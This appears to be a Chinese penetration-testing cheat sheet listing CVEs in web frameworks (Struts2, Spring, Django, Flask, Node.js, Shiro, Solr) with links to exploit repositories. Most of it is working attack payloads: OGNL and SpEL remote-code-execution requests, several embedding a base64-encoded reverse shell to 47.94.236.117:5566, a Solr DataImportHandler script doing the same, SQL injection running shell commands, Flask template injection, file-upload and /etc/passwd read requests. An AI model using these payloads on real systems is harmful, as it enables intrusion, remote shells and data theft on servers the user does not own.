框架安全
框架安全
常见语言开发框架:
PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA:Spring MyBatis Hibernate Struts2 Springboot等
Python:Django Flask Bottle Turbobars Tornado Web2py等
Javascript:Vue.js Node.js Bootstrap JQuery Angular等
PHP-开发框架安全
#PHP-开发框架安全-Thinkphp&Laravel
-Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。
CVE-2021-3129 RCE
Laravel <= 8.4.2
https://github.com/zhzyker/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
Thinkphp-3.X RCE-5.X RCE
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架
武器库-Thinkphp专检
thinkphp
https://www.freebuf.com/articles/web/286234.html
Laravel CVE-2021-3129远程代码执行漏洞
https://zhuanlan.zhihu.com/p/351363561
https://blog.csdn.net/weixin_46944519/article/details/123241080
JAVAWEB-开发框架安全
#JAVAWEB-开发框架安全-Spring&Struts2
Struts2是一个基于MVC设计模式的Web应用框架
1、2020前漏洞
武器库-st2专检
2、cve_2020_17530
脚本:https://github.com/YanMu2020/s2-062
手工:
Content-Type: multipart/form-data; boundary=----1
------1
Content-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------1--
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
Content-Type: application/x-www-form-urlencoded
id=%25%7b%28%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%3d%23%61%70%70%6c%69%63%61%74%69%6f%6e%5b%22%6f%72%67%2e%61%70%61%63%68%65%2e%74%6f%6d%63%61%74%2e%49%6e%73%74%61%6e%63%65%4d%61%6e%61%67%65%72%22%5d%29%2e%28%23%73%74%61%63%6b%3d%23%61%74%74%72%5b%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%75%74%69%6c%2e%56%61%6c%75%65%53%74%61%63%6b%2e%56%61%6c%75%65%53%74%61%63%6b%22%5d%29%2e%28%23%62%65%61%6e%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%63%6f%6c%6c%65%63%74%69%6f%6e%73%2e%42%65%61%6e%4d%61%70%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%73%74%61%63%6b%29%29%2e%28%23%63%6f%6e%74%65%78%74%3d%23%62%65%61%6e%2e%67%65%74%28%22%63%6f%6e%74%65%78%74%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%63%6f%6e%74%65%78%74%29%29%2e%28%23%6d%61%63%63%3d%23%62%65%61%6e%2e%67%65%74%28%22%6d%65%6d%62%65%72%41%63%63%65%73%73%22%29%29%2e%28%23%62%65%61%6e%2e%73%65%74%42%65%61%6e%28%23%6d%61%63%63%29%29%2e%28%23%65%6d%70%74%79%73%65%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%48%61%73%68%53%65%74%22%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%62%65%61%6e%2e%70%75%74%28%22%65%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%22%2c%23%65%6d%70%74%79%73%65%74%29%29%2e%28%23%61%72%67%6c%69%73%74%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%6a%61%76%61%2e%75%74%69%6c%2e%41%72%72%61%79%4c%69%73%74%22%29%29%2e%28%23%61%72%67%6c%69%73%74%2e%61%64%64%28%22%77%68%6f%61%6d%69%22%29%29%2e%28%23%65%78%65%63%75%74%65%3d%23%69%6e%73%74%61%6e%63%65%6d%61%6e%61%67%65%72%2e%6e%65%77%49%6e%73%74%61%6e%63%65%28%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%29%29%2e%28%23%65%78%65%63%75%74%65%2e%65%78%65%63%28%23%61%72%67%6c%69%73%74%29%29%7d
3、cve_2021_31805
https://github.com/YanMu2020/s2-062
Spring框架是由于软件开发的复杂性而创建的。
1、cve_2017_4971-Spring Web Flow
Spring WebFlow 2.4.0 - 2.4.4
https://paper.seebug.org/322/
_eventId_confirm=&_csrf=e06e1d86-e083-45f7-b700-567b5f7f5d30&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/47.94.236.117/5566+0>%261")).start()=vulhub
2、cve_2018_1273-Spring Data Commons
Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 - 3.0.5 (Kay SR5)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%79%4d%7a%59%75%4d%54%45%33%4c%7a%55%31%4e%6a%59%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d")]=&password=&repeatedPassword=
3、CVE-2022-22963 Spring Cloud Function Spel表达式注入
Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")
spring
Spring 远程命令执行漏洞(CVE-2022-22965)原理分析和思考
struts2
Python-开发框架安全
#Python-开发框架安全-Django&Flask
Django
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且Django还包含许多功能强大的第三方插件,使得Django具有较强的可扩展性。
1、cve_2019_14234
单引号已注入成功,SQL语句报错:
/admin/vuln/collection/?detail__a%27b=123
创建cmd_exec:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
调用cmd_exec执行命令:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping hqrwsz.dnslog.cn%27--%20
2、CVE-2021-35042
目录:/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
版本:/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20version())),1)%23
数据库名:/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23
Flask Jinja2 SSTI
Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug ,模板引擎则使用Jinja2 .
?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
Django
Flask
JavaScript-开发框架安全
#JavaScript-开发框架安全-Jquery&Node
jQuery
1、cve_2018_9207 cve_2018_9208 cve_2018_9209
描述: jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jQuery Upload File <= 4.0.2 中的任意文件上传
curl -F "myfile=@php.php" "http://123.58.236.76:56579/jquery-upload-file/php/upload.php"
Node.js
1、cve_2021_21315
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
Systeminformation < 5.3.1
git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC.git
node index.js
/api/getServices?name[]=$(echo -e 'xiaodi' > test.txt)
2、cve_2017_14849
GET:
/static/../../../a/../../../../etc/passwd
Jquery
Node
Apache Shiro-组件框架安全
Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理
判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段
漏洞:https://avd.aliyun.com/search?q=shiro
Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞【CVE-2016-4483】
Apache Shiro < 1.3.2 验证绕过漏洞【CVE-2016-2807】
Apache Shiro < 1.4.2 cookie oracle padding漏洞 【CVE-2019-12442】
Apache Shiro < 1.5.2 验证绕过漏洞 【CVE-2020-1957】
Apache Shiro < 1.5.3 验证绕过漏洞 【CVE-2020-11989】
Apahce Shiro < 1.6.0 验证绕过漏洞 【CVE-2020-13933】
Apahce Shiro < 1.7.1 权限绕过漏洞 【CVE-2020-17523】
1、CVE_2016_4437 Shiro-550+Shiro-721
2、CVE-2020-11989
Poc:/admin/%20
影响范围:Apache Shiro < 1.7.1
https://github.com/jweny/shiro-cve-2020-17523
3、CVE-2020-1957
Poc:/xxx/..;/admin/
影响范围:Apache Shiro < 1.5.3
CVE_2016_4437
CVE_2016_4437 Shiro rememberMe反序列化漏洞
CVE-2020-11989
1.Apache Shiro权限绕过漏洞分析(CVE-2020-11989)
cve-2020-1957
1.shiro权限绕过漏洞分析(cve-2020-1957)
Apache Solr-组件框架安全
Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
漏洞:https://avd.aliyun.com/search?q=solr
远程命令执行RCE(CVE-2017-12629)
远程命令执行XXE(CVE-2017-12629)
任意文件读取AND命令执行(CVE-2019-17558)
远程命令执行漏洞(CVE-2019-0192)
远程命令执行漏洞(CVE-2019-0193)
未授权上传漏洞(CVE-2020-13957)
Apache Solr SSRF (CVE-2021-27905)
1、远程命令执行RCE(CVE-2017-12629)
Apache solr<7.1.0版本
2、任意文件读取AND命令执行(CVE-2019-17558)
Apache Solr 5.0.0版本至8.3.1
https://github.com/jas502n/solr_rce
D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id
3、远程命令执行漏洞(CVE-2019-0193)
Apache Solr < 8.2.0版本
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
4、Apache Solr 文件读取&SSRF (CVE-2021-27905)
全版本官方拒绝修复漏洞
1、获取数据库名
http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json
2、访问触发
curl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
$'http://47.94.236.117:8983/solr/demo/config'
3、任意文件读取
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
浙公网安备 33010602011771号